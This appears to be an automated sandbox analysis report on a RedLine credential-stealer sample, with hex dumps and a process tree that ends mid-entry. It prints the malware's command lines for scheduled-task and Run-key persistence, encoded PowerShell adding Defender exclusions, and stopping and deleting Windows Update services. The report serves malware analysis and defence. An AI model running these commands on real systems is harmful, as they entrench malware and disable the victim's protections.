2022-12-05 00:32:43 UTC	92	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-12-05 00:32:43 UTC	95	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 00 00 00 02 00 00 00 Data Ascii:
2022-12-05 00:32:43 UTC	100	IN	Data Raw: 4f 4e 5f 48 49 4e 54 53 00 63 01 58 38 36 5f 54 55 4e 45 5f 51 49 4d 4f 44 45 5f 4d 41 54 48 00 64 01 58 38 36 5f 54 55 4e 45 5f 50 52 4f 4d 4f 54 45 5f 51 49 5f 52 45 47 53 00 65 01 58 38 36 5f 54 55 4e 45 5f 45 4d 49 54 5f 56 5a 45 52 4f 55 50 50 45 52 00 66 01 58 38 36 5f 54 55 4e 45 5f 4c 41 53 54 00 67 00 03 69 78 38 36 5f 61 72 63 68 5f 69 6e 64 69 63 65 73 00 16 01 00 00 b8 01 57 0e 00 00 01 58 38 36 5f 41 52 43 48 5f 43 4d 4f 56 00 00 01 58 38 36 5f 41 52 43 48 5f 43 4d 50 58 43 48 47 00 01 01 58 38 36 5f 41 52 43 48 5f 43 4d 50 58 43 48 47 38 42 00 02 01 58 38 36 5f 41 52 43 48 5f 58 41 44 44 00 03 01 58 38 36 5f 41 52 43 48 5f 42 53 57 41 50 00 04 01 58 38 36 5f 41 52 43 48 5f 4c 41 53 54 00 05 00 02 01 06 73 69 67 6e 65 64 20 63 68 61 72 00 02 Data Ascii: ON_HINTScX86_TUNE_QIMODE_MATHdX86_TUNE_PROMOTE_QI_REGSeX86_TUNE_EMIT_VZEROUPPERfX86_TUNE_LASTgix86_arch_indicesWX86_ARCH_CMOVX86_ARCH_CMPXCHGX86_ARCH_CMPXCHG8BX86_ARCH_XADDX86_ARCH_BSWAPX86_ARCH_LASTsigned char
2022-12-05 00:32:43 UTC	104	IN	Data Raw: 00 c8 02 00 00 04 00 00 00 03 01 68 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 66 69 6c 65 00 00 00 60 00 00 00 fe ff 00 00 67 01 6e 61 74 73 74 61 72 74 2e 63 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 47 00 00 01 00 00 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 64 61 74 61 00 00 00 a4 ed 00 00 02 00 00 00 03 01 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 62 73 73 00 00 00 00 44 00 00 00 05 00 00 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 66 69 6c 65 00 00 00 68 00 00 00 fe ff 00 00 67 01 77 69 6c 64 63 61 72 64 2e 63 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 47 00 00 01 00 00 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 64 61 74 61 00 00 00 ac ed Data Ascii: h.file`gnatstart.c.textG.data.bssD.filehgwildcard.c.textG.data
2022-12-05 00:32:43 UTC	108	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 2e 62 73 73 00 00 00 00 9c 00 00 00 05 00 00 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 00 d4 06 00 00 04 00 00 00 03 01 90 01 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 66 69 6c 65 00 00 00 5a 01 00 00 fe ff 00 00 67 01 66 61 6b 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 05 00 00 00 00 00 00 0b 00 00 00 03 01 26 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa 05 00 00 00 00 00 00 0c 00 00 00 03 01 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 05 00 00 00 00 00 00 0d 00 00 00 03 01 76 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 56 00 00 01 00 00 00 03 01 2a 00 00 00 00 00 00 00 00 Data Ascii: .bss.fileZgfake&v.textV*
2022-12-05 00:32:43 UTC	112	IN	Data Raw: 61 24 35 80 01 00 00 06 00 00 00 03 00 2e 69 64 61 74 61 24 34 d8 00 00 00 06 00 00 00 03 00 2e 69 64 61 74 61 24 36 bc 03 00 00 06 00 00 00 03 00 2e 74 65 78 74 00 00 00 18 57 00 00 01 00 00 00 03 00 2e 64 61 74 61 00 00 00 c4 ed 00 00 02 00 00 00 03 00 2e 62 73 73 00 00 00 00 b0 00 00 00 05 00 00 00 03 00 2e 69 64 61 74 61 24 37 80 04 00 00 06 00 00 00 03 00 2e 69 64 61 74 61 24 35 84 01 00 00 06 00 00 00 03 00 2e 69 64 61 74 61 24 34 dc 00 00 00 06 00 00 00 03 00 2e 69 64 61 74 61 24 36 c6 03 00 00 06 00 00 00 03 00 2e 66 69 6c 65 00 00 00 44 02 00 00 fe ff 00 00 67 01 66 61 6b 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 6e 61 6d 65 00 00 00 80 00 00 00 06 00 00 00 03 00 66 74 68 75 6e 6b 00 00 28 01 00 00 06 00 00 00 03 00 2e 74 65 78 74 00 00 00 Data Ascii: a$5.idata$4.idata$6.textW.data.bss.idata$7.idata$5.idata$4.idata$6.fileDgfakehnamefthunk(.text
2022-12-05 00:32:43 UTC	116	IN	Data Raw: a7 09 00 00 10 00 00 00 07 00 00 00 02 00 00 00 00 00 b7 09 00 00 00 00 00 00 ff ff 00 00 02 00 00 00 00 00 cb 09 00 00 80 01 00 00 06 00 00 00 02 00 00 00 00 00 da 09 00 00 00 00 00 00 00 00 20 00 02 01 13 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 09 00 00 20 00 00 00 05 00 00 00 02 00 00 00 00 00 fe 09 00 00 00 00 00 00 05 00 00 00 02 00 00 00 00 00 0c 0a 00 00 0c 11 00 00 03 00 00 00 02 00 00 00 00 00 2f 0a 00 00 00 10 00 00 ff ff 00 00 02 00 00 00 00 00 47 0a 00 00 04 00 00 00 07 00 00 00 02 00 00 00 00 00 59 0a 00 00 34 01 00 00 06 00 00 00 02 00 00 00 00 00 6d 0a 00 00 fc 00 00 00 06 00 00 00 02 00 00 00 00 00 85 0a 00 00 00 00 00 00 ff ff 00 00 02 00 00 00 00 00 97 0a 00 00 00 00 00 00 ff ff 00 00 02 00 00 00 00 00 c3 0a 00 Data Ascii: /GY4m
2022-12-05 00:32:43 UTC	120	IN	Data Raw: 61 6c 50 72 6f 74 65 63 74 40 31 36 00 5f 5f 5f 52 55 4e 54 49 4d 45 5f 50 53 45 55 44 4f 5f 52 45 4c 4f 43 5f 4c 49 53 54 5f 5f 00 5f 5f 64 61 74 61 5f 73 74 61 72 74 5f 5f 00 5f 46 72 65 65 4c 69 62 72 61 72 79 40 34 00 5f 5f 5f 44 54 4f 52 5f 4c 49 53 54 5f 5f 00 5f 5f 69 6d 70 5f 5f 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 40 31 36 00 5f 5f 5f 73 65 74 75 73 65 72 6d 61 74 68 65 72 72 00 5f 5f 63 6f 6d 6d 6f 64 65 00 5f 5f 69 6d 70 5f 5f 5f 6f 6e 65 78 69 74 00 5f 5f 5f 70 5f 5f 66 6d 6f 64 65 00 5f 5f 69 6d 70 5f 5f 47 65 74 4c 61 73 74 45 72 72 6f 72 40 30 00 5f 53 65 74 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 40 34 00 5f 5f 69 6d 70 5f 5f 56 69 72 74 75 61 6c 51 75 65 72 79 40 31 32 00 5f 5f 5f 74 6c 73 5f 73 74 61 Data Ascii: alProtect@16___RUNTIME_PSEUDO_RELOC_LIST____data_start___FreeLibrary@4___DTOR_LIST____imp__VirtualProtect@16___setusermatherr__commode__imp___onexit___p__fmode__imp__GetLastError@0_SetUnhandledExceptionFilter@4__imp__VirtualQuery@12___tls_sta

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: N2wufLmC74.exePID: 6060, Parent PID: 3452

General

Target ID:	0
Start time:	01:31:57
Start date:	05/12/2022
Path:	C:\Users\user\Desktop\N2wufLmC74.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\N2wufLmC74.exe
Imagebase:	0x13c0000
File size:	2580721 bytes
MD5 hash:	A55758362B29072504453D64E5D475CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.240125643.0000000000A02000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6024, Parent PID: 6060

General

Target ID:	1
Start time:	01:31:58
Start date:	05/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: vbc.exePID: 2416, Parent PID: 6060

General

Target ID:	2
Start time:	01:31:59
Start date:	05/12/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe
Imagebase:	0x11f0000
File size:	2688096 bytes
MD5 hash:	B3A917344F5610BEEC562556F11300FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conchsvt.exePID: 5232, Parent PID: 2416

General

Target ID:	12
Start time:	01:32:30
Start date:	05/12/2022
Path:	C:\Users\user\AppData\Local\Microsoft\conchsvt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Microsoft\conchsvt.exe"
Imagebase:	0x510000
File size:	28672 bytes
MD5 hash:	68E3359674EE7D49550B09E7FF69DCCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 62%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2228, Parent PID: 5232

General

Target ID:	13
Start time:	01:32:31
Start date:	05/12/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: brave.exePID: 5184, Parent PID: 2416

General

Target ID:	14
Start time:	01:32:32
Start date:	05/12/2022
Path:	C:\Users\user\AppData\Local\Google\brave.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Google\brave.exe"
Imagebase:	0x7ff715b90000
File size:	2884608 bytes
MD5 hash:	9253ED091D81E076A3037E12AF3DC871
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 85%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2460, Parent PID: 2228

General

Target ID:	15
Start time:	01:32:34
Start date:	05/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2068, Parent PID: 2228

General

Target ID:	16
Start time:	01:32:34
Start date:	05/12/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Imagebase:	0x7ff7538e0000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conchsvt.exePID: 3388, Parent PID: 1080

General

Target ID:	17
Start time:	01:32:34
Start date:	05/12/2022
Path:	C:\Users\user\AppData\Local\Microsoft\conchsvt.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Microsoft\conchsvt.exe
Imagebase:	0x690000
File size:	28672 bytes
MD5 hash:	68E3359674EE7D49550B09E7FF69DCCE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5252, Parent PID: 5184

General

Target ID:	18
Start time:	01:32:35
Start date:	05/12/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff6cc430000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5220, Parent PID: 3388

General

Target ID:	19
Start time:	01:32:35
Start date:	05/12/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1840, Parent PID: 5252

General

Target ID:	20
Start time:	01:32:35
Start date:	05/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1976, Parent PID: 5220

General

Target ID:	21
Start time:	01:32:38
Start date:	05/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ofg.exePID: 244, Parent PID: 2416

General

Target ID:	22
Start time:	01:32:36
Start date:	05/12/2022
Path:	C:\Users\user\AppData\Local\Google\ofg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Google\ofg.exe"
Imagebase:	0xd00000
File size:	88064 bytes
MD5 hash:	33DAD992607D0FFD44D2C81FE67F8FB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: C:\Users\user\AppData\Local\Google\ofg.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 684, Parent PID: 244

General

Target ID:	23
Start time:	01:32:36
Start date:	05/12/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Imagebase:	0x10b0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3956, Parent PID: 684

General

Target ID:	24
Start time:	01:32:37
Start date:	05/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68f300000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6028, Parent PID: 2416

General

Target ID:	25
Start time:	01:32:37
Start date:	05/12/2022
Path:	C:\Users\user\AppData\Local\Google\chrome.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Google\chrome.exe"
Imagebase:	0xb20000
File size:	6423552 bytes
MD5 hash:	8CD1EA50F8F4C45055400E70DA52B326
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 65%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: ofg.exePID: 5360, Parent PID: 1080

General

Target ID:	26
Start time:	01:32:39
Start date:	05/12/2022
Path:	C:\Users\user\AppData\Local\Google\ofg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Google\ofg.exe
Imagebase:	0xd00000
File size:	88064 bytes
MD5 hash:	33DAD992607D0FFD44D2C81FE67F8FB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2820, Parent PID: 5360

General

Target ID:	28
Start time:	01:32:42
Start date:	05/12/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Imagebase:	0x10b0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 4980, Parent PID: 5220

General

Target ID:	29
Start time:	01:32:42
Start date:	05/12/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Imagebase:	0x7ff7538e0000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4528, Parent PID: 2820

General

Target ID:	30
Start time:	01:32:42
Start date:	05/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4560, Parent PID: 5184

General

Target ID:	31
Start time:	01:32:42
Start date:	05/12/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5116, Parent PID: 6028

General

Target ID:	32
Start time:	01:32:42
Start date:	05/12/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Imagebase:	0x7ff651c80000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3956, Parent PID: 5184

General

Target ID:	33
Start time:	01:32:42
Start date:	05/12/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5100, Parent PID: 4560

General

Target ID:	34
Start time:	01:32:42
Start date:	05/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 2348, Parent PID: 6028

General

Target ID:	35
Start time:	01:32:43
Start date:	05/12/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA=
Imagebase:	0xa70000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1852, Parent PID: 5184

General

Target ID:	36
Start time:	01:32:43
Start date:	05/12/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Imagebase:	0x7ff6cc430000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3600, Parent PID: 3956

General

Target ID:	37
Start time:	01:32:43
Start date:	05/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4996, Parent PID: 5116

General

Target ID:	38
Start time:	01:32:43
Start date:	05/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: zonewar.exePID: 4984, Parent PID: 2416

General

Target ID:	39
Start time:	01:32:43
Start date:	05/12/2022
Path:	C:\Users\user\AppData\Local\Temp\zonewar.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\zonewar.exe"
Imagebase:	0xc20000
File size:	124986 bytes
MD5 hash:	B5CC85BB2FCFA979BC843618C0119D05
Has elevated privileges:	true
